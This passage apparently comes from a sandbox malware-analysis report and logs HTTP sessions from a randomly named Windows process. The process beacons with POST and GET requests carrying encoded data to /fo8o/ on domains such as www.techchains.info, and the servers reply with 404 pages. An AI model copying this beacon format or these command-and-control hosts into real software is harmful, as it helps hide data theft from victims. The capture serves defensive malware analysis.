                                                                            Nov 22, 2024 07:51:42.053251982 CET | 1236 | IN | Data Raw: 68 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 62 75 74 74 6f 6e
                                                                            Data Ascii: h]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:n
                                                                            Nov 22, 2024 07:51:42.053262949 CET | 658 | IN | Data Raw: 68 3a 39 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 38 32 30 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 7b 70 61 64 64 69 6e 67 3a 30 20 30 20 31 2e 36 65 6d 20 30 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f
                                                                            Data Ascii: h:90%;min-height:820px}.two-tier-ads-list{padding:0 0 1.6em 0}.two-tier-ads-list__list-element{list-style:none;padding:10px 0 5px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images
                                                                            Nov 22, 2024 07:51:42.053272963 CET | 1236 | IN | Data Raw: 35 37 36 0d 0a 3a 23 30 61 34 38 66 66 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d
                                                                            Data Ascii: 576:#0a48ff}.two-tier-ads-list__list-element-link:link,.two-tier-ads-list__list-element-link:visited{text-decoration:underline}.two-tier-ads-list__list-element-link:hover,.two-tier-ads-list__list-element-link:active,.two-tier-ads-list__list-
                                                                            Nov 22, 2024 07:51:42.053283930 CET | 1236 | IN | Data Raw: 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 7d 2e 63 6f 6e 74 61 69
                                                                            Data Ascii: __content{display:inline-block;font-family:arial,sans-serif;font-size:12px}.container-searchbox__searchtext-label{display:none}.container-searchbox__input,.container-s17A2earchbox__button{border:0 none}.container-searchbox__button{cursor:p
                                                                            Nov 22, 2024 07:51:42.053296089 CET | 1236 | IN | Data Raw: 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f
                                                                            Data Ascii: x}.container-cookie-message__content-text{color:#fff}.container-cookie-message__content-text{margin-left:15%;margin-right:15%}.container-cookie-message__content-interactive{text-align:left;margin:0 15px;font-size:10px}.container-cookie-message
                                                                            Nov 22, 2024 07:51:42.053307056 CET | 1236 | IN | Data Raw: 6e 74 65 6e 74 2d 6e 65 63 65 73 73 61 72 79 2d 63 6f 6f 6b 69 65 73 2d 72 6f 77 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 65 65 31 65 33 7d 2e 64 69 73 61 62 6c 65 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7a 2d 69 6e 64 65
                                                                            Data Ascii: ntent-necessary-cookies-row{background-color:#dee1e3}.disabled{display:none;z-index:-999}.btn{display:inline-block;border-style:solid;border-radius:5px;padding:15px 25px;text-align:center;text-decoration:none;cursor:pointer;margin:5px;transiti
                                                                            Nov 22, 2024 07:51:42.053319931 CET | 1236 | IN | Data Raw: 6e 3a 2e 34 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 7d 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 3a 62 65 66 6f 72 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 68 65 69 67 68 74 3a 32 36
                                                                            Data Ascii: n:.4s;transition:.4s}.switch__slider:before{position:absolute;content:"";height:26px;width:26px;left:4px;bottom:4px;background-color:#fff;-webkit-transition:.4s;transition:.4s}.switch__slider--round{border-radius:34px}.switch__slider--round:be
Nov 22, 2024 07:51:42.173207045 CET | 1236 | IN | Data Raw: 36 59 65 53 72 72 71 33 57 45 65 5a 38 65 6e 50 56 57 35 63 4e 57 4e 30 58 69 41 52 63 75 57 52 43 52 31 2f 41 34 2b 37 75 44 45 65 41 31 70 72 48 77 3d 3d 22 2c 22 74 69 64 22 3a 33 30 34 39 2c 22 62 75 79 62 6f 78 22 3a 66 61 6c 73 65 2c 22 62
                                                                            Data Ascii: 6YeSrrq3WEeZ8enPVW5cNWN0XiARcuWRCR1/A4+7uDEeA1prHw==","tid":3049,"buybox":false,"buyboxTopic":true,"disclaimer":true,"imprint":false,"searchbox":true,"noFollow":false,"slsh":false,"ppsh":true,"dnhlsh":true,"toSellUrl":"","toSellText":"","searc


Session ID: 13
Source IP: 192.168.2.4   Source Port: 50010
Destination IP: 66.29.149.46   Destination Port: 80
PID: 5436
Process: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe

Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:51:56.242892981 CET | 779 | OUT | POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.techchains.info
                                                                            Origin: http://www.techchains.info
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 202
                                                                            Referer: http://www.techchains.info/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 2b 53 2f 61 53 52 75 44 6a 49 4c 65 52 30 63 34 56 6b 6a 6a 56 4e 64 79 32 5a 68 6a 50 75 73 66 51 3d 3d
                                                                            Data Ascii: Ml18S=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXI+S/aSRuDjILeR0c4VkjjVNdy2ZhjPusfQ==
Nov 22, 2024 07:51:57.569866896 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Fri, 22 Nov 2024 06:51:57 GMT
                                                                            Server: Apache
                                                                            Content-Length: 493
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


Session ID: 14
Source IP: 192.168.2.4   Source Port: 50017
Destination IP: 66.29.149.46   Destination Port: 80
PID: 5436
Process: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe

Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:51:58.897321939 CET | 799 | OUT | POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.techchains.info
                                                                            Origin: http://www.techchains.info
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 222
                                                                            Referer: http://www.techchains.info/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 70 75 76 78 51 56 75 4d 54 6c 45 56 6d 4c 76 34 52 72 53 73 79 31 5a 71 7a 64 6e 4b 6a 59 2f 51 51 3d
                                                                            Data Ascii: Ml18S=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVpuvxQVuMTlEVmLv4RrSsy1ZqzdnKjY/QQ=
Nov 22, 2024 07:52:00.185381889 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Fri, 22 Nov 2024 06:51:59 GMT
                                                                            Server: Apache
                                                                            Content-Length: 493
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


Session ID: 15
Source IP: 192.168.2.4   Source Port: 50018
Destination IP: 66.29.149.46   Destination Port: 80
PID: 5436
Process: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe

Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:52:01.553869009 CET | 10881 | OUT | POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.techchains.info
                                                                            Origin: http://www.techchains.info
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 10302
                                                                            Referer: http://www.techchains.info/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 59 57 44 7a 38 46 78 77 4e 31 67 46 4d 79 78 42 4d 2f 74 4e 50 62 42 6b 57 57 67 36 35 72 57 39 4f 68 53 34 37 52 2b 49 76 2f 74 6c 59 78 46 53 30 52 52 4d 7a 73 32 41 2b 4f 70 6a 76 75 49 4d 42 4c 6f 72 56 6b 36 6f 46 50 36 58 70 72 6d 36 76 4d 62 77 6e 74 34 44 51 71 68 38 63 4e 67 73 67 6b 32 32 38 6b 32 4c 35 50 6e 67 59 79 6f 4f 64 66 6c 6e 46 72 57 37 4d 33 4c 63 46 50 73 78 68 52 66 2b 2f 2f 44 34 64 63 54 77 61 4f 56 4c 68 76 33 65 43 55 5a 71 70 75 73 48 77 79 58 50 77 67 [TRUNCATED]
Data Ascii: Ml18S=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNnYWDz8FxwN1gFMyxBM/tNPbBkWWg65rW9OhS47R+Iv/tlYxFS0RRMzs2A+OpjvuIMBLorVk6oFP6Xprm6vMbwnt4DQqh8cNgsgk228k2L5PngYyoOdflnFrW7M3LcFPsxhRf+//D4dcTwaOVLhv3eCUZqpusHwyXPwg [TRUNCATED]
Nov 22, 2024 07:52:03.439923048 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Fri, 22 Nov 2024 06:52:02 GMT
                                                                            Server: Apache
                                                                            Content-Length: 493
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


Session ID: 16
Source IP: 192.168.2.4   Source Port: 50019
Destination IP: 66.29.149.46   Destination Port: 80
PID: 5436
Process: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe

Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:52:04.249063015 CET | 515 | OUT | GET /fo8o/?Ml18S=vefd0teQh+kbruh+h6aX8PBfjiL7oFyRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd7w81ULHWk02cFWPIOqV4u3afmCGnKNzdpU=&nVb4=q2L0IduHqXQ8JBmp HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Host: www.techchains.info
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Nov 22, 2024 07:52:05.483556032 CET | 652 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Fri, 22 Nov 2024 06:52:05 GMT
                                                                            Server: Apache
                                                                            Content-Length: 493
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


Session ID: 17
Source IP: 192.168.2.4   Source Port: 50020
Destination IP: 195.110.124.133   Destination Port: 80
PID: 5436
Process: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe

Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:52:11.506185055 CET | 797 | OUT | POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.elettrosistemista.zip
                                                                            Origin: http://www.elettrosistemista.zip
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 202
                                                                            Referer: http://www.elettrosistemista.zip/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 78 4e 59 78 49 4d 31 4a 74 4b 41 2f 57 70 73 58 50 78 74 43 78 4c 4c 67 4e 74 47 63 72 37 79 6e 77 3d 3d
                                                                            Data Ascii: Ml18S=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCixNYxIM1JtKA/WpsXPxtCxLLgNtGcr7ynw==
Nov 22, 2024 07:52:12.871778965 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Fri, 22 Nov 2024 06:52:12 GMT
                                                                            Server: Apache
                                                                            Content-Length: 203
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


Session ID: 18
Source IP: 192.168.2.4   Source Port: 50021
Destination IP: 195.110.124.133   Destination Port: 80
PID: 5436
Process: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe

Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:52:14.165221930 CET | 817 | OUT | POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.elettrosistemista.zip
                                                                            Origin: http://www.elettrosistemista.zip
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 222
                                                                            Referer: http://www.elettrosistemista.zip/fo8o/
